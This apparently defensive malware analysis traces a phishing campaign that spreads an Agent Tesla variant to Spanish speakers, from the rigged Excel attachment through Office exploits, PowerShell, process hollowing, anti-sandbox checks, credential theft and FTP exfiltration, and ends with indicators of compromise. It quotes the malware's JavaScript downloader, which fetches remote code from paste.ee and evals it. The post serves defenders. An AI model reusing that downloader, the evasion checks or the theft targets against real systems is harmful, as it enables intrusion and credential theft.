Porqué a Mi? (Why Me)

12672524291?profile=RESIZE_180x180Our friends at FortiGuard Labs recently captured a new phishing campaign that demonstrates the spread of a new Agent Tesla variant, specifically targeting Spanish-speaking people.  Agent Tesla is a well-known. Net-based Remote Access Trojan (RAT) is designed to stealthily infiltrate victim’s computers and steal their sensitive information, such as their computer’s hardware information, login user information, keystrokes, email contacts, web browser cookies files, system clipboard data, screenshots, and basic information like login user name, computer name, OS information, CPU and RAM information, as well as saved credentials in widely installed software.

FortiGuard’s expert In-depth research on this campaign shows that it also leverages multiple techniques to deliver the Agent Tesla core module, such as using known MS Office vulnerabilities, JavaScript code, PowerShell code, fileless modules, and more, to protect itself from being analyzed by security researchers.

The analysis below shows how the campaign works to load Agent Tesla onto a victim’s computer, how it starts, what sensitive data it is able to collect, and the way it sends stolen data to the attacker.

The Phishing Email

12672525069?profile=RESIZE_584xFigure 1 – The phishing email.

In this screenshot, the phishing email was written in Spanish.  The message translated into English reads as:

Good day

Attached is proof of payment made to your account according to your client's instructions.

The phishing email, shown in Figure 1, looks like a standard SWIFT transfer notification from a large financial institution. It includes a disguised Excel attachment (transferencia_swift_87647574684.xla) for the victim.

As you may have noticed, the FortiClient service marked the phishing email with “[virus detected]” to warn the user about the attached Excel document.

The Excel Document—The Excel document is in OLE format with crafted embedded data that exploits the CVE-2017-0199 vulnerability. It contains an embedded OLE hyperlink, which is opened automatically once the victim starts the Excel document. The provided hyperlink in the document is “hxxp[:]//ilang[.]in/QqBbmc,” as shown in Figure 2.

12672524692?profile=RESIZE_584xFigure 2 – Embedded OLE hyperlink to an online RTF document.

Once the victim opens the Excel file, it automatically downloads an RTF document, which the Word program then calls to open.  Figure 3 shows the traffic and how the URL downloads the RTF document.

12672524900?profile=RESIZE_584xFigure 3 – The equation content inside the RTF document.

CVE-2017-11882 is Exploited / CVE-2017-11882 is an RCE (Remote Code Execution) vulnerability in Microsoft Office’s Equation Editor component (EQNED32.EXE). It can be exploited by Excel, Word, PowerPoint, and RTF documents as long as they contain crafted equation data in an OLE object.  Successfully exploiting this vulnerability allows an attacker to execute arbitrary code on a victim's computer.  This buffer overflow vulnerability overrides a return address in the stack of EQNED32.EXE.  It can then hijack the process to jump to and execute the malicious code copied in the stack.

12672525299?profile=RESIZE_584xFigure 4 – Crafted equation data.

Figure 4 shows the crafted equation data extracted from the downloaded RTF document.  The data marked in red is a constant address of EQNED32.EXE that will override a return address in the stack when a buffer overflow occurs.  Once the shellcode is executed, it downloads a JavaScript code from a website and executes it on the victim’s computer.  In Figure 5, the shellcode was about to call an API, URLDownloadToFileW(), to download the JavaScript file from “hxxp[:]//equalizerrr[.]duckdns.org/eveningdatingforeveryone.js” to the local file “C:\Users\Bobs\AppData\Roaming\morningdatingroses.js.”

12672525868?profile=RESIZE_584xFigure 5 – Shellcode to download a JavaScript file to local.

It then calls the API ShellExecuteW() to execute the JavaScript file (the Windows program WScript.exe is called to execute the JS file). Finally, it exits the process by calling the API ExitProcess().

JavaScript Files Lead to Execute PowerShell Code - Below is a code snippet of the JavaScript file.  It is very clear that it continues to download another file from “hxxps[:]//paste[.]ee/d/yWWXG.”  This JavaScript file is executed after calling the eval() function.

morningdatingroses.js:

var paparicos = new ActiveXObject("MSXML2.XMLHTTP");
var alijar = "GXWWy/d/ee.etsap//:sptth".split("").reverse().join("");
paparicos.open("GET", alijar, false);
paparicos.send();

var vomitar = "";
if (paparicos.status === 200) {
    vomitar = paparicos.responseText;
}

function estarostia(piguancha) {
    eval(piguancha);
}

estarostia(vomitar);

12672525900?profile=RESIZE_584xFigure 6 – Base64 encoded PowerShell code.

When opening the URL in a web browser, it looks like normal JavaScript code, but it contains a piece of malicious code with base64-encoded PowerShell code. This code will be decoded, combined with other code (shown below), and executed inside a “powershell.exe” process, as you can see in Figure 6.

The PowerShell code’s purpose includes:  Downloading a standard jpg file with a base64 encoded .Net module (the loader-module) appended to it.  The URL of the jpg file is a constant string: “hxxps[:]//uploaddeimagens[.]com[.]br/images/004/773/812/original/js.jpg?1713882778”.

Extracting the loader-module from the jpg file, base64 decoding it, and loading it into PowerShell’s memory.

Calling the loader-module’s VAI() method under the namespace PROJETOAUTOMACAO.VB and the class Home.

Please refer to Figure 7 for more information about the PowerShell code.

12672526259?profile=RESIZE_584xFigure 7 – The base64 decoded PowerShell code.

The loader module is a fileless module that is never saved in the local folder. This makes it difficult for a researcher to notice the file unless performing a step-by-step, in-depth analysis.  The first argument to the method VAI() is a reversed URL to the Agent Tesla core module, which is “hxxp[:]//equalizerrr[.]duckdns[.]org/droidbase64controlfire.txt.” The second argument is a switch. If it’s “1,” it will establish persistence on the victim’s computer by adding itself to the auto-run group in the system’s registry. In this case, it’s "desativado,” so it won’t establish.

The penultimate argument is a process name for this variant: “AddInProcess32.”

A Look into the Loader Module—The loader module running in a PowerShell process downloads a file from the URL passed by the first argument and keeps it in memory. This is the Agent Tesla core module, as shown in Figure 8.

12672526087?profile=RESIZE_584xFigure 8 – Loader-module downloads Agent Tesla executable.

Afterward, it initiates the 'AddInProcess32' process in a suspended state by calling the API CreateProcessA() with the creation flags of 0x80000004 (CREATE_SUSPENDED).  Next, the loader-module performs process hollowing on the process that it copies the Agent Tesla executable into and executes it within the “AddInProcess32.exe” process.  To do this, it calls APIs, such as GetThreadContext(), VirtualAllocEx(), WriteProcessMemory(), SetThreadContext(), and ResumeThread().

12672526671?profile=RESIZE_584xFigure 9 shows the process tree outlining the complete picture, starting from the Excel document and ending with Agent Tesla running inside “AddInProcess32.exe.”

Figure 9 – Process tree of the relevant processes.

Agent Tesla Executable Module - This variant of Agent Tesla is a 32-bit .Net framework program is being obfuscated as a fileless module.  Figure 10 shows a debugger that breaks Agent Tesla at the EntryPoint method, where the namespaces, classes, methods, and code flow are all obfuscated.

12672526695?profile=RESIZE_584xFigure 10 – Obfuscated Agent Tesla executable in a debugger.

A special method aims to detect whether it is running in an analysis environment. It performs the following detections:

  • It calls the Windows API CheckRemoteDebuggerPresent() to determine if it’s debugged.
  • Agent Tesla calculates the difference between two tick counts before and after sleeping for ten milliseconds to detect whether it is being debugged or running in a VM.
  • It checks whether some AV or sandbox-related DLLs are loaded in the current process, such as "SbieDLL.dll" for Sandboxie, "SxIn.dll" for Qihu 360, "Sf2.dll" for Avast, "snxhk.dll" for Sophos Intercept X, and "cmdvrt32.dll" for Comodo.
  • Agent Tesla checks if it’s running in a virtualization environment by executing two WMI queries to retrieve the computer’s hardware information, like “Manufacturer,” “Model,” and “Name” of the video controller. It then matches some keywords, such as “Microsoft corporation,” “VMware,” “VIRTUAL,” “VirtualBox,” and “VBox” within the retrieved hardware information.
  • It visits the URL “hxxp://ip-api[.]com/line/?fields=hosting” and checks if the response is “true.” This allows it to check if it’s running in a host provider or a data center.
  • Once any of the above detections’ results are ‘true,’ it exits the process.

 

Sensitive Information Stolen from the Victim Device  - Next is a review of the Agent Tesla’s features, such as how this variant collects credentials and email contacts from the victim’s device, the software from which it collects the data, and the basic information of the victim’s device.

  • It steals saved credentials from some web browsers, classified as Chromium-based and Mozilla-based, because they use the same folder structure and files to save the credentials.
  • It reads saved credentials from “Login Data” files under their browsers’ profile folder for Chromium-based browsers. Figure 11 shows that it had just obtained some “Opera Browser” (Chromium-based browser) credentials from its profile files “{browser’s profile path}\Default\Login Data” and “{browser’s profile path}\Login Data.”

12672526876?profile=RESIZE_584xFigure 11 – Stolen credentials from Chromium-based browser.

12672526893?profile=RESIZE_584xFigure 12 – Stolen credentials from Mozilla-based browser.

Figure 12 shows it has just obtained credentials from a Firefox browser’s profile. This variant will steal credentials from the following web browser list.

Chromium-based Web Browsers:

"Orbitum," "Elements Browser," "Cool Novo," "Sputnik," "360 Browser," "Uran," "Iridium Browser," "Liebao Browser," "Vivaldi," "Chromium," "Sleipnir 6," "Coowon," "Coccoc," "Amigo," "Chedot," "Epic Privacy," "CentBrowser," "Edge Chromium," "Chrome," "Citrio," "Opera Browser," "QIP Surf," "Brave," "Kometa," "Comodo Dragon," "7Star," "Torch Browser," "Yandex Browser."

Mozilla-based Web Browsers:

"Firefox, "CyberFox, "WaterFox, "K-Meleon, "Postbox, "Thunderbird browser, "IceCat, "Flock, "IceDragon, "BlackHawk, "PaleMoon," and "SeaMonkey.”

Other than the above web browsers, Agent Tesla continues to look for more saved credentials from a wide range of software, which are categorized below.

Other Web Browsers:

"Falkon Browser," "Flock Browser," "IE/Edge," "QQ Browser," "Safari for Windows," and "UC Browser.”

Email clients:

"Outlook, "Opera Mail, "PocoMail, "The Bat!", "Becky!", "ClawsMail, "FoxMail, "IncrediMail, "eM Client, "Mailbird, "Eudora," and "Windows Mail App."

FTP clients:

"CoreFTP," "Flash FXP," "FTPGetter," "FTP Navigator,"  "FileZilla," "SmartFTP," "FtpCommander," "WinSCP," and "WS_FTP."            

VPN clients:

"NordVPN," "TightVNC," "RealVNC," "UltraVNC," "OpenVPN," and "Private Internet Access."

IM client:

"Discord," "Pidgin," "Trillian," "Psi/Psi+," and "Paltalk."

Others:

"MysqlWorkbench," "DynDns," "Microsoft Credentials," "Internet Downloader Manager," and "JDownloader.”

Agent Tesla can also collect the victim’s email contacts if they use Thunderbird as their email client.  Inside global-messages-db.sqlite, under the Thunderbird profile folder, there is a file named global-messages-db.sqlite.  It is an SQLite database that stores an index of all messages, including attachments, BCC and CC emails, folder names, and more.  Agent Tesla extracts all contacts (email addresses) from such files.

12672527475?profile=RESIZE_710xFigure 13 – Agent Tesla collects contacts from the victim.

Based on my analysis, this variant disabled some features (some switch variables are set to “false” by default.), such as the keylogger, the screen logger, the system clipboard logger, and cookies.  Refer to Figure 14 for details. 

12672527700?profile=RESIZE_710xFigure 14 – Some features are disabled by default.

Agent Tesla also collects information about the victim’s computer, such as the system date and time, login user name, computer name, public IP address, OS full name, CPU information, and RAM capacity.

Submitting Stolen Data to an FTP Server - In the past, we captured many Agent Tesla variants that used HTTP POST and SMTP to submit their stolen data to their C2 server.  This variant uses a new way to submit the data it collects from the victim’s device over the FTP protocol.  The FTP server address and credentials are plaintext strings held in some global variables.

12672528054?profile=RESIZE_710xFigure 15 – Submit stolen data via FTP.

Figure 15 is a screenshot of Agent Tesla about to submit s credentials stolen from my test machine using the FTP method “STOR.”  The format of the file name on the FTP is in “PW_{User name-Computer name_System Data&Time}.html”; the content is the stolen data in HTML format.  The collected email contacts are in a txt file named “Contacts_Thunderbird.txt_{User name-Computer name_System Data&Time}.txt”. One example on my test machine is “Contacts_Thunderbird.txt_Bobs-BOBS-PC_2024_05_17_17_34_21.txt”. The txt file contains all the email addresses collected from Thunderbird.

This analysis demonstrates the entire process of the Agent Tesla campaign targeting Spanish-speaking people.  The flowchart in Figure 16 outlines this complex malicious campaign, detailing the process from the phishing email to the stolen information being submitted to an FTP server.

12672527898?profile=RESIZE_710xFigure 16 – The whole process of this Agent Tesla campaign.

It was examined how it uses multiple techniques to escape researcher analysis, such as exploiting two Microsoft vulnerabilities carried by Excel and RTF documents, executing JavaScript and PowerShell scripts, and encoding most downloaded files in base64.

Next, researchers looked at how the fileless loader module is called to download the Agent Tesla executable and run it in a process-hollowed AddInProcess.exe process.  Then, their researcher expanded on how Agent Tesla detects whether it’s running in an analysis environment, like sandboxes, virtual machines, etc., or where AV software is running, like Avast, Comodo, etc.  The functions of this variant were shown, and how it performs on the victim’s device were shown.  It collects saved credentials from over 80 popular software applications and victim email contacts from Thunderbird profile files.  Lastly, how this Agent Tesla variant submits the sensitive data was demonstrated by harvesting from the victim’s device to an FTP server using the “STOR” method. 

IOCs

URLs

hxxps[:]//ilang[.]in/QqBbmc

hxxp[:]//equalizerrr[.]duckdns[.]org/eveningdatingforeveryone.js

hxxp[:]//equalizerrr[.]duckdns[.]org/droidbase64controlfire.txt

hxxps[:]//paste[.]ee/d/yWWXG

hxxps[:]//uploaddeimagens[.]com[.]br/images/004/773/812/original/js.jpg?1713882778

FTP Server List

ftp[.]fosna.net

Relevant Sample SHA-256

[transferencia_swift_87647574684.xla]

8406A1D7A33B3549DD44F551E5A68392F85B5EF9CF8F9F3DB68BD7E02D1EABA7

[RTF document]

208AF8E2754A3E55A64796B29EF3A625D89A357C59C43D0FF4D2D30E20092D74

[The loader-module]

7230CC614270DCA79415B0CF53A666A219BEB4BEED90C85A1AC09F082AEA613B

[Agent Tesla Executable]

A1475A0042FE86E50531BB8B8182F9E27A3A61F204700F42FD26406C3BDEC862

 

This article is shared at no charge and is for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization and, yes, an SASE.  For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com    

Weekly Cyber Intelligence Briefings:

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings

https://register.gotowebinar.com/register/5378972949933166424

E-mail me when people leave their comments –

You need to be a member of Red Sky Alliance to add comments!